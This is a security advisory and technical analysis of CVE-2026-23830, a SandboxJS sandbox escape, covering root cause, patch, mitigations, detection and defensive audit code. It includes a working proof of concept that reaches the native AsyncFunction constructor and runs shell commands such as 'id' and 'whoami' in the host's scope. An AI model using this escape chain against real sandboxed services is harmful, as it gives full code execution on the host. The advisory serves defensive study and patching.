CVE-2026-23830
Weakness (CWE)
CVSS Vector (v3.1)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Changed
- Confidentiality: High
- Integrity: High
- Availability: High
Description
SandboxJS is a JavaScript sandboxing library. Versions prior to 0.8.26 have a sandbox escape vulnerability due to `AsyncFunction` not being isolated in `SandboxFunction`. The library attempts to sandbox code execution by replacing the global `Function` constructor with a safe, sandboxed version (`SandboxFunction`). This is handled in `utils.ts` by mapping `Function` to `sandboxFunction` within a map used for lookups. However, before version 0.8.26, the library did not include mappings for `AsyncFunction`, `GeneratorFunction`, and `AsyncGeneratorFunction`. These constructors are not global properties but can be accessed via the `.constructor` property of an instance (e.g., `(async () => {}).constructor`). In `executor.ts`, property access is handled. When code running inside the sandbox accesses `.constructor` on an async function (which the sandbox allows creating), the `executor` retrieves the property value. Since `AsyncFunction` was not in the safe-replacement map, the `executor` returns the actual native host `AsyncFunction` constructor. Constructors for functions in JavaScript (like `Function`, `AsyncFunction`) create functions that execute in the global scope. By obtaining the host `AsyncFunction` constructor, an attacker can create a new async function that executes entirely outside the sandbox context, bypassing all restrictions and gaining full access to the host environment (Remote Code Execution). Version 0.8.26 patches this vulnerability.
Comprehensive Technical Analysis of CVE-2026-23830 (SandboxJS Sandbox Escape Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
CVE ID: CVE-2026-23830
CVSS Score: 10.0 (Critical) – AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Vulnerability Type: Sandbox Escape (Remote Code Execution - RCE)
Root Cause: Incomplete isolation of JavaScript function constructors (AsyncFunction, GeneratorFunction, AsyncGeneratorFunction) in the SandboxJS library.
Severity Justification
- Attack Vector (AV:N): Exploitable over the network through any channel that feeds attacker-supplied JavaScript into the sandbox.
- Attack Complexity (AC:L): Low; no race, special configuration, or victim preparation is required. The attacker only needs to get a few lines of JavaScript executed in the sandbox.
- Privileges Required (PR:N): None; unauthenticated attackers can exploit this.
- User Interaction (UI:N): None; exploitation can occur without user action.
- Scope (S:C): Changed; the vulnerability allows escape from the sandbox, affecting the host system.
- Confidentiality (C:H), Integrity (I:H), Availability (A:H): Full compromise of the host environment is possible.
The CVSS 10.0 rating is justified due to the complete sandbox escape, enabling unrestricted RCE in the host environment.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
The vulnerability arises from incomplete sandboxing of JavaScript function constructors. SandboxJS replaces the global `Function` constructor with a safe alternative (`SandboxFunction`), but before 0.8.26 did not do the same for:
- `AsyncFunction`
- `GeneratorFunction`
- `AsyncGeneratorFunction`
None of these is a global, which is why the missing mapping is easy to overlook; each is reachable through the prototype chain of an instance that the sandbox lets attacker code create. An attacker exploits this by:
- Creating an async function inside the sandbox:
  `const maliciousAsyncFn = async () => {};`
- Accessing its constructor, which the executor returns unreplaced:
  `const AsyncFunction = maliciousAsyncFn.constructor;`
- Using the native `AsyncFunction` to compile code that runs in host scope:
  `const escapeFn = new AsyncFunction("return process.mainModule.require('child_process').execSync('whoami').toString()"); escapeFn(); // executes in the host environment`
Attack Vectors
- Web Applications Using SandboxJS:
- If an application allows user-supplied JavaScript to execute in a SandboxJS environment (e.g., plugin systems, scriptable workflows), an attacker can escape the sandbox and execute arbitrary commands.
- Server-Side JavaScript (Node.js):
- If SandboxJS is used to isolate untrusted code in a Node.js environment, exploitation leads to full server compromise.
- Browser-Based Sandboxing:
- If SandboxJS is used in a browser context (e.g., for isolating third-party scripts), exploitation could lead to DOM-based attacks, cookie theft, or XSS escalation.
Proof-of-Concept (PoC) Exploit
    // Inside the SandboxJS environment
    (async () => {
      // `.constructor` of any async function is the native AsyncFunction,
      // which SandboxJS < 0.8.26 does not replace
      const AsyncFunction = (async () => {}).constructor;
      const escape = new AsyncFunction(`
        return process.mainModule.require('child_process').execSync('id').toString();
      `);
      // An AsyncFunction returns a Promise, so await it before logging
      console.log(await escape()); // Outputs host system user ID
    })();
This PoC demonstrates RCE by running a shell command (id) on the host system. `process.mainModule` is deprecated and is undefined when the host entry point is an ES module, but the particular property chain is incidental: once code compiles in host scope, the host `process` object and everything reachable from it are available.
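The PoC above shows the escape; the following is an added example (not code from the original page or from SandboxJS) of the check a practitioner would run to find it, or its siblings, in any sandbox under test. It asks the sandbox for the four function constructors exactly as the exploit reaches them and reports which ones are the host's own native constructors, comparing by identity rather than by name. The `evalInSandbox(src)` callback is an assumption: wire it to whatever evaluates source inside the sandbox you are auditing. The `unsafeEval` reference below is a constructed stand-in that isolates nothing, so it must report all four; per the description, a SandboxJS build before 0.8.26 would be expected to report the three non-`Function` constructors.

```javascript
// Added audit probe for CVE-2026-23830-style constructor leaks.
// Assumption: `evalInSandbox(src)` evaluates `src` inside the sandbox under
// test and returns the resulting value; it is not part of any library API.

// Native host constructors, obtained the only way they can be: none of the
// last three is a global, each is only reachable through a prototype chain.
const HOST = {
  Function: Function,
  AsyncFunction: Object.getPrototypeOf(async function () {}).constructor,
  GeneratorFunction: Object.getPrototypeOf(function* () {}).constructor,
  AsyncGeneratorFunction: Object.getPrototypeOf(async function* () {}).constructor,
};

// Source the probe runs inside the sandbox; each expression reaches a
// constructor exactly as the exploit does.
const PROBES = {
  Function: "(function () {}).constructor",
  AsyncFunction: "(async function () {}).constructor",
  GeneratorFunction: "(function* () {}).constructor",
  AsyncGeneratorFunction: "(async function* () {}).constructor",
};

// Returns the names of the constructors the sandbox hands back unreplaced.
function auditConstructorLeaks(evalInSandbox) {
  const leaked = [];
  for (const [name, src] of Object.entries(PROBES)) {
    let value;
    try {
      value = evalInSandbox(src);
    } catch (e) {
      continue; // the sandbox refused the expression outright: not a leak
    }
    // Identity, not name: a sandboxed replacement may also be called "Function".
    if (value === HOST[name]) leaked.push(name);
  }
  return leaked;
}

// Constructed reference "sandbox": plain host evaluation through the native
// Function constructor. It isolates nothing, so every probe is a leak.
function unsafeEval(src) {
  return new Function("return (" + src + ")")();
}

// Usage: auditConstructorLeaks(unsafeEval)
//   -> ["Function", "AsyncFunction", "GeneratorFunction", "AsyncGeneratorFunction"]
```

Run the probe against each sandbox release you deploy, not once: the fix for this CVE is a map of known constructors, and any future native callable that compiles source (or any new route to the existing ones) would show up as a fresh entry in the returned list.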
3. Affected Systems and Software Versions
Vulnerable Versions
- SandboxJS versions < 0.8.26
Affected Environments
- Node.js applications using SandboxJS for code isolation.
- Browser-based applications that rely on SandboxJS for sandboxing untrusted scripts.
- Any system where SandboxJS is used to execute untrusted JavaScript (e.g., plugin systems, scriptable APIs).
Unaffected Versions
- SandboxJS 0.8.26 and later (patched).
4. Recommended Mitigation Strategies
Immediate Actions
- Upgrade to SandboxJS 0.8.26 or later (recommended fix).
  - The patch adds mappings for `AsyncFunction`, `GeneratorFunction`, and `AsyncGeneratorFunction` in `utils.ts`.
  - Commit reference: 345aee6566e47979dee5c337b925b141e7f78ccd
- Apply workarounds (if upgrade is not possible):
  - Disable async/generator functions in the sandboxed environment (if feasible). This only helps if the sandbox's own parser rejects them before execution; screening submitted source text for the keywords is bypassable.
  - Use an isolation mechanism with a stronger boundary (e.g., isolated-vm, a separate process, or Deno's permission model). vm2 is not a substitute: its maintainers discontinued it in 2023 after repeated sandbox escapes.
  - Treat any code that reaches the sandbox as untrusted input: restrict who can submit it and from where. Input validation cannot make arbitrary JavaScript safe to run.
Long-Term Mitigations
- Adopt Zero-Trust Sandboxing:
  - Use WebAssembly (WASM) for untrusted code execution where possible.
  - Implement process isolation: run untrusted code in a separate OS process or container with minimal privileges. Node.js `worker_threads` share the host process and its memory, so they are not an isolation boundary.
- Enhance Monitoring:
  - Log and alert on function constructor access in sandboxed environments. Do this at the sandbox's property-access hook, comparing the resolved value by identity against the native constructors; matching the string `.constructor` in submitted source is trivially bypassed (e.g., `x["constr" + "uctor"]`).
- Security Testing:
- Fuzz testing to identify similar sandbox escape vectors.
- Static and dynamic analysis of sandboxed code execution.
5. Impact on the Cybersecurity Landscape
Broader Implications
- Increased Risk of Supply Chain Attacks:
- If SandboxJS is used in CI/CD pipelines, plugin systems, or serverless functions, exploitation could lead to widespread compromise.
- Erosion of Trust in JavaScript Sandboxing:
- This vulnerability highlights fundamental flaws in JavaScript sandboxing (similar to past issues in VM2, SES, and other libraries).
- Exploitation in Malicious NPM Packages:
- Attackers may embed sandbox escape payloads in malicious NPM packages, leading to supply chain attacks.
Comparison to Similar Vulnerabilities
| Vulnerability | Library | Root Cause | Impact |
|---|---|---|---|
| CVE-2022-36067 | vm2 | Host `Error.prepareStackTrace` call-site objects reachable from the sandbox ("Sandbreak") | Sandbox escape → RCE |
| CVE-2023-37466 | vm2 | Promise handler sanitization bypassed via the `@@species` accessor | Sandbox escape → RCE |
| CVE-2026-23830 | SandboxJS | Missing `AsyncFunction`/`GeneratorFunction`/`AsyncGeneratorFunction` isolation | Sandbox escape → RCE |
This vulnerability reinforces the need for rigorous sandboxing mechanisms beyond simple constructor replacement.
6. Technical Details for Security Professionals
Root Cause Analysis
- SandboxJS's isolation mechanism:
  - The library replaces the global `Function` constructor with `SandboxFunction` to prevent direct access to the host environment.
  - However, `AsyncFunction`, `GeneratorFunction`, and `AsyncGeneratorFunction` were not included in the safe-replacement map (`utils.ts`).
- Exploitation flow:
  - Sandboxed code creates an async function: `const asyncFn = async () => {};`
  - It reads the constructor: `const AsyncFunction = asyncFn.constructor;`. The property read in `executor.ts` consults the replacement map, finds no entry for the native `AsyncFunction`, and returns it unchanged.
  - The native `AsyncFunction` then compiles arbitrary source into a function that runs in host scope, outside every sandbox restriction.
Patch Analysis
- Fix in `utils.ts` (SandboxJS 0.8.26): the replacement map gains entries for the three missing constructors. Because none of them is a global, they have to be obtained from an instance's prototype chain first; the snippet below does that with `Object.getPrototypeOf` (illustrative reconstruction of the change, identifiers may differ from the commit).
    // Added mappings for missing constructors
    const AsyncFunction = Object.getPrototypeOf(async function () {}).constructor;
    const GeneratorFunction = Object.getPrototypeOf(function* () {}).constructor;
    const AsyncGeneratorFunction = Object.getPrototypeOf(async function* () {}).constructor;
    const constructorMap = new Map<Function, Function>([
      [Function, sandboxFunction],
      [AsyncFunction, sandboxFunction],          // ← New
      [GeneratorFunction, sandboxFunction],      // ← New
      [AsyncGeneratorFunction, sandboxFunction], // ← New
    ]);
- Impact of the fix: any attempt to reach `AsyncFunction` (or the other two constructors) via `.constructor` now resolves to the sandboxed version, so the host-scope compilation path is closed.
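To make the root cause and the fix concrete, here is an added model of the property lookup the advisory describes. It is not SandboxJS's code: `resolveProperty`, the two maps and the toy `sandboxFunction` are assumptions made for illustration, and only the mechanism (swap a native constructor for a sandboxed one by identity; miss the ones the map does not know) is taken from the description above. Generator functions are used for the demonstration instead of async functions because they run synchronously, which keeps the host-scope read observable without a Promise.

```javascript
// Added model of the pre-0.8.26 and patched replacement maps; not SandboxJS code.

// The three constructors are not globals; they are reached through the
// prototype chain of an instance, exactly as exploit code reaches them.
const AsyncFunction = Object.getPrototypeOf(async function () {}).constructor;
const GeneratorFunction = Object.getPrototypeOf(function* () {}).constructor;
const AsyncGeneratorFunction = Object.getPrototypeOf(async function* () {}).constructor;

// Constructed host-scope value that sandboxed code must not be able to read.
globalThis.hostSecret = "host-only-value";

// Toy replacement constructor (assumption): compiles the body with a fixed
// list of host names shadowed by parameters bound to undefined. A real
// sandbox runs the body in its own interpreter instead; this shadowing is
// only enough for the demonstration and is NOT a safe sandbox on its own.
const SHADOWED = ["hostSecret", "process", "require", "globalThis"];
function sandboxFunction(body) {
  const compiled = new Function(...SHADOWED, body);
  return function sandboxed() {
    return compiled(...SHADOWED.map(() => undefined));
  };
}

// Replacement maps: the pre-0.8.26 shape knows only `Function`; the patched
// shape covers all four constructor kinds.
const PRE_0_8_26 = new Map([[Function, sandboxFunction]]);
const PATCHED = new Map([
  [Function, sandboxFunction],
  [AsyncFunction, sandboxFunction],
  [GeneratorFunction, sandboxFunction],
  [AsyncGeneratorFunction, sandboxFunction],
]);

// Model of the executor's property read: fetch the value, then swap it for
// its sandboxed replacement if, and only if, the map has an entry for it.
function resolveProperty(obj, key, replacements) {
  const value = obj[key];
  return replacements.has(value) ? replacements.get(value) : value;
}

// What sandboxed code gets back from `(function* () {}).constructor`.
function constructorSeenBySandbox(replacements) {
  return resolveProperty(function* () {}, "constructor", replacements);
}

// Compile "return hostSecret" through whatever the lookup returned. The
// native GeneratorFunction runs the body in host scope and reads the value;
// the toy replacement shadows the name, so the body sees undefined.
function readHostSecretVia(replacements) {
  const Ctor = constructorSeenBySandbox(replacements);
  const fn = new Ctor("return hostSecret");
  const result = fn();
  // A native generator function hands back an iterator; drive it one step.
  return result && typeof result.next === "function" ? result.next().value : result;
}

// Usage:
//   readHostSecretVia(PRE_0_8_26)  -> "host-only-value"  (escape)
//   readHostSecretVia(PATCHED)     -> undefined          (contained)
```

The lookup is keyed by identity, which is the right primitive: the map cannot be fooled by renaming, but it can only ever catch constructors someone thought to list. That is exactly why the audit probe earlier compares by identity as well, and why the list should be revisited whenever the runtime gains a new callable that compiles source.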
Detection and Forensics
- Indicators of Compromise (IoCs):
  - Unexpected `AsyncFunction` or `GeneratorFunction` constructor access from sandboxed code.
  - Child process spawning from the process hosting the sandbox.
  - Network connections originating from sandboxed code.
- Forensic artifacts:
  - Node.js process logs (e.g., `child_process.execSync` calls, where such auditing is in place).
  - Heap snapshots showing functions compiled from attacker-supplied source outside the sandbox.
  - Network traffic from sandboxed code (if RCE was used for data exfiltration).
Exploitation Difficulty
- Low:
  - Requires basic JavaScript knowledge (accessing `.constructor`).
  - No memory corruption or complex ROP chains needed (pure logic flaw).
  - The three-line chain in the PoC above is the entire exploit, so working payloads are trivial to produce.
Conclusion
CVE-2026-23830 is a critical sandbox escape vulnerability in SandboxJS, allowing unrestricted RCE in the host environment. The flaw stems from incomplete isolation of JavaScript function constructors, enabling attackers to bypass sandbox restrictions via AsyncFunction.
Key Takeaways for Security Teams:
✅ Immediate patching (upgrade to SandboxJS 0.8.26 or later).
✅ Audit sandboxed environments for similar misconfigurations.
✅ Monitor for exploitation attempts (unexpected AsyncFunction usage).
✅ Consider alternative sandboxing mechanisms (e.g., WASM, isolated-vm).
This vulnerability underscores the importance of comprehensive sandboxing and the risks of incomplete security controls in JavaScript environments. Organizations using SandboxJS should treat this as a high-priority remediation task to prevent potential breaches.